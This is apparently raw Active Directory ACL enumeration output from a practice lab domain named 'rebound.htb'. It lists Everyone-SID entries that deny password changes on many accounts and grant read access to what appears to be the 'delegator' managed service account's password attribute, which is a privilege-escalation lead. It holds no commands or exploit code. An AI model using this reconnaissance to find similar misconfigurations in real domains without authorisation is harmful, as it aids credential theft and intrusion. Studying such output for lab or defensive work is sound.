SecurityIdentifier    : S-1-1-0
AceType               : AccessAllowed
AceFlags              : None
IsInherited           : False
InheritanceFlags      : None
PropagationFlags      : None
AuditFlags            : None

ObjectDN              : DC=k.root-servers.net,DC=RootDNSServers,CN=MicrosoftDNS,CN=System,DC=rebound,DC=htb
ObjectSID             :
ActiveDirectoryRights : GenericRead
BinaryLength          : 20
AceQualifier          : AccessAllowed
IsCallback            : False
OpaqueLength          : 0
AccessMask            : 131220
SecurityIdentifier    : S-1-1-0
AceType               : AccessAllowed
AceFlags              : None
IsInherited           : False
InheritanceFlags      : None
PropagationFlags      : None
AuditFlags            : None

ObjectDN               : CN=ppaul,CN=Users,DC=rebound,DC=htb
ObjectSID              : S-1-5-21-4078382237-1492182817-2568127209-1951
ActiveDirectoryRights  : ExtendedRight
ObjectAceFlags         : ObjectAceTypePresent
ObjectAceType          : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength           : 40
AceQualifier           : AccessDenied
IsCallback             : False
OpaqueLength           : 0
AccessMask             : 256
SecurityIdentifier     : S-1-1-0
AceType                : AccessDeniedObject
AceFlags               : None
IsInherited            : False
InheritanceFlags       : None
PropagationFlags       : None
AuditFlags             : None

ObjectDN               : CN=llune,CN=Users,DC=rebound,DC=htb
ObjectSID              : S-1-5-21-4078382237-1492182817-2568127209-2952
ActiveDirectoryRights  : ExtendedRight
ObjectAceFlags         : ObjectAceTypePresent
ObjectAceType          : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength           : 40
AceQualifier           : AccessDenied
IsCallback             : False
OpaqueLength           : 0
AccessMask             : 256
SecurityIdentifier     : S-1-1-0
AceType                : AccessDeniedObject
AceFlags               : None
IsInherited            : False
InheritanceFlags       : None
PropagationFlags       : None
AuditFlags             : None

ObjectDN               : CN=fflock,CN=Users,DC=rebound,DC=htb
ObjectSID              : S-1-5-21-4078382237-1492182817-2568127209-3382
ActiveDirectoryRights  : ExtendedRight
ObjectAceFlags         : ObjectAceTypePresent
ObjectAceType          : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength           : 40
AceQualifier           : AccessDenied
IsCallback             : False
OpaqueLength           : 0
AccessMask             : 256
SecurityIdentifier     : S-1-1-0
AceType                : AccessDeniedObject
AceFlags               : None
IsInherited            : False
InheritanceFlags       : None
PropagationFlags       : None
AuditFlags             : None

ObjectDN               : CN=jjones,CN=Users,DC=rebound,DC=htb
ObjectSID              : S-1-5-21-4078382237-1492182817-2568127209-5277
ActiveDirectoryRights  : ExtendedRight
ObjectAceFlags         : ObjectAceTypePresent
ObjectAceType          : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength           : 40
AceQualifier           : AccessDenied
IsCallback             : False
OpaqueLength           : 0
AccessMask             : 256
SecurityIdentifier     : S-1-1-0
AceType                : AccessDeniedObject
AceFlags               : None
IsInherited            : False
InheritanceFlags       : None
PropagationFlags       : None
AuditFlags             : None

ObjectDN               : CN=mmalone,CN=Users,DC=rebound,DC=htb
ObjectSID              : S-1-5-21-4078382237-1492182817-2568127209-5569
ActiveDirectoryRights  : ExtendedRight
ObjectAceFlags         : ObjectAceTypePresent
ObjectAceType          : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength           : 40
AceQualifier           : AccessDenied
IsCallback             : False
OpaqueLength           : 0
AccessMask             : 256
SecurityIdentifier     : S-1-1-0
AceType                : AccessDeniedObject
AceFlags               : None
IsInherited            : False
InheritanceFlags       : None
PropagationFlags       : None
AuditFlags             : None

ObjectDN               : CN=nnoon,CN=Users,DC=rebound,DC=htb
ObjectSID              : S-1-5-21-4078382237-1492182817-2568127209-5680
ActiveDirectoryRights  : ExtendedRight
ObjectAceFlags         : ObjectAceTypePresent
ObjectAceType          : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength           : 40
AceQualifier           : AccessDenied
IsCallback             : False
OpaqueLength           : 0
AccessMask             : 256
SecurityIdentifier     : S-1-1-0
AceType                : AccessDeniedObject
AceFlags               : None
IsInherited            : False
InheritanceFlags       : None
PropagationFlags       : None
AuditFlags             : None

ObjectDN               : CN=ldap_monitor,CN=Users,DC=rebound,DC=htb
ObjectSID              : S-1-5-21-4078382237-1492182817-2568127209-7681
ActiveDirectoryRights  : ExtendedRight
ObjectAceFlags         : ObjectAceTypePresent
ObjectAceType          : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength           : 40
AceQualifier           : AccessDenied
IsCallback             : False
OpaqueLength           : 0
AccessMask             : 256
SecurityIdentifier     : S-1-1-0
AceType                : AccessDeniedObject
AceFlags               : None
IsInherited            : False
InheritanceFlags       : None
PropagationFlags       : None
AuditFlags             : None

ObjectDN               : CN=oorend,CN=Users,DC=rebound,DC=htb
ObjectSID              : S-1-5-21-4078382237-1492182817-2568127209-7682
ActiveDirectoryRights  : ExtendedRight
ObjectAceFlags         : ObjectAceTypePresent
ObjectAceType          : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength           : 40
AceQualifier           : AccessDenied
IsCallback             : False
OpaqueLength           : 0
AccessMask             : 256
SecurityIdentifier     : S-1-1-0
AceType                : AccessDeniedObject
AceFlags               : None
IsInherited            : False
InheritanceFlags       : None
PropagationFlags       : None
AuditFlags             : None

ObjectDN               : CN=winrm_svc,OU=Service Users,DC=rebound,DC=htb
ObjectSID              : S-1-5-21-4078382237-1492182817-2568127209-7684
ActiveDirectoryRights  : ExtendedRight
ObjectAceFlags         : ObjectAceTypePresent
ObjectAceType          : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength           : 40
AceQualifier           : AccessDenied
IsCallback             : False
OpaqueLength           : 0
AccessMask             : 256
SecurityIdentifier     : S-1-1-0
AceType                : AccessDeniedObject
AceFlags               : None
IsInherited            : False
InheritanceFlags       : None
PropagationFlags       : None
AuditFlags             : None

ObjectDN               : CN=batch_runner,OU=Service Users,DC=rebound,DC=htb
ObjectSID              : S-1-5-21-4078382237-1492182817-2568127209-7685
ActiveDirectoryRights  : ExtendedRight
ObjectAceFlags         : ObjectAceTypePresent
ObjectAceType          : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength           : 40
AceQualifier           : AccessDenied
IsCallback             : False
OpaqueLength           : 0
AccessMask             : 256
SecurityIdentifier     : S-1-1-0
AceType                : AccessDeniedObject
AceFlags               : None
IsInherited            : False
InheritanceFlags       : None
PropagationFlags       : None
AuditFlags             : None

ObjectDN               : CN=tbrady,CN=Users,DC=rebound,DC=htb
ObjectSID              : S-1-5-21-4078382237-1492182817-2568127209-7686
ActiveDirectoryRights  : ExtendedRight
ObjectAceFlags         : ObjectAceTypePresent
ObjectAceType          : ab721a53-1e2f-11d0-9819-00aa0040529b
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength           : 40
AceQualifier           : AccessDenied
IsCallback             : False
OpaqueLength           : 0
AccessMask             : 256
SecurityIdentifier     : S-1-1-0
AceType                : AccessDeniedObject
AceFlags               : None
IsInherited            : False
InheritanceFlags       : None
PropagationFlags       : None
AuditFlags             : None

ObjectDN               : CN=delegator,CN=Managed Service Accounts,DC=rebound,DC=htb
ObjectSID              : S-1-5-21-4078382237-1492182817-2568127209-7687
ActiveDirectoryRights  : ExtendedRight
ObjectAceFlags         : ObjectAceTypePresent
ObjectAceType          : 00299570-246d-11d0-a768-00aa006e0529
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength           : 40
AceQualifier           : AccessDenied
IsCallback             : False
OpaqueLength           : 0
AccessMask             : 256
SecurityIdentifier     : S-1-1-0
AceType                : AccessDeniedObject
AceFlags               : None
IsInherited            : False
InheritanceFlags       : None
PropagationFlags       : None
AuditFlags             : None

ObjectDN               : CN=delegator,CN=Managed Service Accounts,DC=rebound,DC=htb
ObjectSID              : S-1-5-21-4078382237-1492182817-2568127209-7687
ActiveDirectoryRights  : ReadProperty
ObjectAceFlags         : ObjectAceTypePresent
ObjectAceType          : e362ed86-b728-0842-b27d-2dea7a9df218
InheritedObjectAceType : 00000000-0000-0000-0000-000000000000
BinaryLength           : 40
AceQualifier           : AccessAllowed
IsCallback             : False
OpaqueLength           : 0
AccessMask             : 16
SecurityIdentifier     : S-1-1-0
AceType                : AccessAllowedObject
AceFlags               : None
IsInherited            : False
InheritanceFlags       : None
PropagationFlags       : None
AuditFlags             : None